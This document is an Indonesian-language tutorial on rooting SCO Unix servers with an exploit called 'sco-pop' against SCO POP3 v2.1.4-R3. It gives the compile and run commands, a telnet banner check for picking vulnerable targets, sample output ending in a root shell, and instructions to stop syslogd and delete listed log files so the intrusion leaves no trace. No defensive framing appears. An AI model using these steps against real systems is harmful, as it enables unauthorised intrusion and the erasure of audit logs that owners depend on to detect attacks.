1. Alat2 yang diperlukan.
- shell *nix bole linux, irix, solaris, bsd.
- c compiler salah satunya gcc
- exploit nya :) [ banyak tersedia dimana-mana]

2. Cara meng-kompile
- Gampang.. d/l exploitnya.. terus ketik.. di shell kamu:

[l33nux@localhost /home/l33nux]$ gcc sco-pop.c -o sco-pop

3. Cara men-jalankan
- Lakukan ini : ./sco-pop , akan tampil di layar anda:

[l33nux@localhost /home/l33nux]$ ./sco-pop
Usage: ./sco-pop [offset]
Default offset is 0. It works against SCOPOP v2.1.4-R3

4. Mencari server SCO Unix yang bisa ditembus
Aku tidak akan menerangkan bagaimana cara mencari server SCO Unix, karena pasti kalian
bisa mencarinya :) ..hanya cara melihat bisa ditembus atawa tidaknya bisa kalian lakukan
dengan cara telnet ke port 110, 
caranya :


[l33nux@localhost /home/l33nux]$ telnet www.target.com 110
+OK SCO POP3 server (version 2.1.4-R3) at www.target.com starting.

Jika outputnya seperti diatas, artinya server SCO Unix itu bisa ditembus.

5. Saatnya rooting
OK, sekarang saatnya get root acces server ini, jalankan exploit anda terhadap server ini
:

./sco-pop www.sco.com

Hasil di layar:
[l33nux@localhost /home/l33nux]$ ./sco-pop www.target.com
CONNECTED TO www.masquetheatre.org... SENDING DATA
+OK SCO POP3 server (version 2.1.4-R3) at www.target.com starting. 
-ERR Unknown command:

Sekarang ketik id terus enter kemudian ketik id lagi dan enter. Id pertama tidak akan
bekerja.. 
yang kedua bekerja.

Hasil di layar:
uid=0(root) gid=3(sys) groups=3(sys),0(root),1(other)

6. Setelah dapat akses root, .. selanjutnya ?
Sekarang kamu punya account root, ini berarti kamu bisa melakukan apa saja.. namun jangan
lupa untuk mematikan syslogd dan mendelete log filenya.

alamat log file :)
/var/adm
ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx